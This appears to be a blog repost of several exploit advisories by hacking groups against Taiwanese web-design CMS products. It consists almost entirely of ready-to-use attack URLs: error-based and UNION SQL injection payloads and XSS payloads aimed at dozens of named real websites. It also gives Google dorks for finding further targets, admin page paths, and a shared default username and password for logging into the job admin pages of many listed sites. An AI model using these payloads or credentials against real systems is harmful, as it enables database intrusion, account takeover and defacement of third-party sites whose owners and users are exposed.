# http://www.tw-sd.com/bbs/board.php?bo_table=product&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.su-attorneys.com.tw/bbs/board.php?bo_table=legal&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.e-topway.com.tw/bbs/board.php?bo_table=product&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.wtd.com.tw/bbs/board.php?bo_table=building&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://home-light.com.tw/bbs/board.php?bo_table=qa&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.cscsignal.com.tw/bbs/board.php?bo_table=qa&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
#################################################################
########################################
# Exploit Title : Design By 種籽網頁設計 Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.e-seed.com.tw/
# Google Dork : site:.tw inurl:board.php? stx=
# Date: 2015/12/28
######################
#
# Demo:
#
#http://www.sun-wang.com.tw/bbs/board.php?bo_table=news&page=2&sfl=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team
#http://www.spaceframeal.com.tw/bbs/board.php?bo_table=service&sst=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team
#http://www.shootingsport.org.tw/bbs/board.php?bo_table=fire&sst=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team
#http://yoli.com.tw/bbs/board.php?bo_table=qa&wr_id=7&sfl=&stx=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team
#http://e-wewe.com.tw/bbs/board.php?bo_table=faq&stx=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team
#http://www.sushionly.com.tw/bbs/board.php?bo_table=menu&stx=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team
#http://lovinghut.com.tw/portal/tw/bbs/board.php?bo_table=menu_tw_en&sfl=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Teamwr_link1&stx=8&lang=_en&m=ct
#http://www.rtr-tech.com.tw/bbs/board.php?bo_table=news_en&stx=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team
#
#######################################
######################
# Exploit Title : PGO CMS SQL Injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.pgo.tw/
# Google Dork : intext:"趴趴狗旅遊網設計" inurl:index.php?id2=
# Date: 30 Dec 2015
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
# adminpage= target/admin/
#
# demos :
# http://www.happiness163.com/index.php?id=594330&id2=-2389%27+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--%20-
# http://www.stuartvilla.com.tw/index.php?id=594591&id2=-2569%27+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--%20-
# http://www.rainbowtown.com.tw/index.php?id=584&id2=-7587+union+select+1,2,3,4,5,version(),7,8,9,10,11,12
# http://www.bali-bali.com.tw/index.php?id=704&id2=-2536%27+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--%20-
# http://demo.pgo.tw/index.php?id=147&id2=-9495+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16
# http://www.fishfun.tw/index.php?id=594313&id2=-7592+union+select+1,2,3,4,5,version(),7,8,9,10,11,12
# http://www.sara82-1.com/index.php?id=595126&id2=-1691%27+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--%20-
# http://www.allparty.com.tw/index.php?id=594149&id2=-1708%27+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--%20-
# http://www.wzhotel.tw/index.php?id=592503&id2=-2888+union+select+1,2,3,4,5,version(),7,8,9,10,11,12
# http://fangshuh.com.tw/index.php?id=593219&id2=-7585+union+select+1,2,3,4,5,version(),7,8,9,10,11,12
# http://111yotaiwan.com/index.php?id=595787&id2=-2145%27+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--%20-
# http://www.waterripple.tw/index.php?id=595061&id2=-7536+union+select+1,2,3,4,5,version(),7,8,9,10,11,12
# http://caifeng500.com.tw/index.php?id=594280&id2=-4837+union+select+1,2,3,4,5,version(),7,8,9,10,11,12
# http://www.hw32.com/index.php?id=2742&id2=-2453%27+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--%20-
######################
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|----------------------In The Name Of God------------------------|
|[+] Exploit Title: 網頁設計 詮通網頁設計 Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor Homepage: http://www.s2-everywhere.com/
|[+]
|[+] Google Dork: intext:"網頁設計詮通網頁設計" news_detail.php?
|[+]
|[+] Tested on: Win 10 / Mozilla Firefox
|[+]
|[+] Date: 2016 08 January
|[+]
|--------------------------------------------------------------|
|[+] Exploit:
|[+] Search dork and choose a target and add "%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e" after URL!
|[+] To see Vulnerability!
|--------------------------------------------------------------|
|[+] Examples :
|[+]
|[+] https://www.nics.org.tw/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] https://www.mt.org.tw/taipeicity/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.topetag.com/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.tsvs.org/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.asi-hk.com/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.muchang.com.tw/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.yamato.tw/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.yellow-gold.com.tw/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.99cook.com.hk/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.hengjo.com.tw/news_detail.php?serial=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.chien-feng.com/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.hartfordbuy.com.tw/news_detail.php?newsid=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://member.asiamc.com.tw/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.bbbook.com.tw/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
######################
# Exploit Title : 彩虹軒設計整合行銷 SQL Injection Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.digart.com.tw/
# Google Dork : intext:"彩虹軒設計整合行銷" inurl:/seenews.php
# Date: 06.01.2016
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
# adminpage= target/admin.php
#
# demos :
# http://mks-servo.com.tw/seenews.php?idNo=-70+union+select+1,2,version(),4,5,6
# http://www.how-mama.com.tw/seenews.php?idNo=-51+union+select+1,2,version(),4,5,6
# http://www.sea-chicken.com.tw/seenews.php?idNo=-77+union+select+1,2,version(),4,5,6
# http://www.amrita.com.tw/seenews.php?idNo=-123+union+select+1,2,version(),4,5,6
# http://ilan-asahi.com.tw/seenews.php?idNo=-89+union+select+1,2,version(),4,5,6
# http://mks-servo.com.tw/seenews.php?idNo=-81+union+select+1,2,version(),4,5,6
# http://arjay.com.tw/seenews.php?idNo=-562+union+select+1,2,version(),4,5,6
# http://www.arthurschool.com.tw/seenews.php?idNo=-35+union+select+1,2,version(),4,5,6
# http://reflex.com.tw/seenews.php?idNo=-95+union+select+1,2,version(),4,5,6
# http://www.liferainbow.com.tw/seenews.php?idNo=-85+/*!50000union*/+select+1,2,version(),4,5,6
# http://www.chau-feng.com.tw/seenews.php?idNo=-63+/*!50000union*/+select+1,2,version(),4,5,6
# http://www.shenyun66.com.tw/seenews.php?idNo=-78+/*!50000union*/+select+1,2,version(),4,5,6
# http://www.goldi.com.tw/seenews.php?idNo=-66+/*!50000union*/+select+1,2,version(),4,5,6
######################
# discovered by : modiret
######################
######################
# Exploit Title : 百邇來 網頁設計 Weak Password
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.buyersline.com.tw/
# Google Dork : intext:"網頁設計 百邇來"
# Date: 2016 01 10
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
#
# Search Google Dork and Choose a Target and put this after URL : /jobs/index_login.php
# and put this username & password :
# username : steve
# password : blc2293
#
# Demos :
#
# http://www.thhpacking.com/jobs/index_login.php
# http://www.hsienchi.com.tw/jobs/index_login.php
# http://www.young-spring.com/jobs/index_login.php
# http://www.lively-travel-thailand.com/jobs/index_login.php
# http://www.ceramiccartridge.com.tw/jobs/index_login.php
# http://www.looben.com.tw/jobs/index_login.php
# http://www.jiujan.com.tw/jobs/index_login.php
# http://www.tohoku.com.tw/jobs/index_login.php
# http://www.yonghopumps.com/jobs/index_login.php
# http://www.macaca.com.tw/jobs/index_login.php
# http://www.jinn-jye.com.tw/jobs/index_login.php
# http://gmpbaby.com.tw/jobs/index_login.php
# http://www.unotex.com.tw/jobs/index_login.php
# http://www.yonghopumps.com/jobs/index_login.php
# http://www.mindfulness.org.tw/jobs/index_login.php
# http://www.ghkairsoft.com/jobs/index_login.php
# http://www.abgenomics.com/jobs/index_login.php
######################
0 nhận xét:
Post a Comment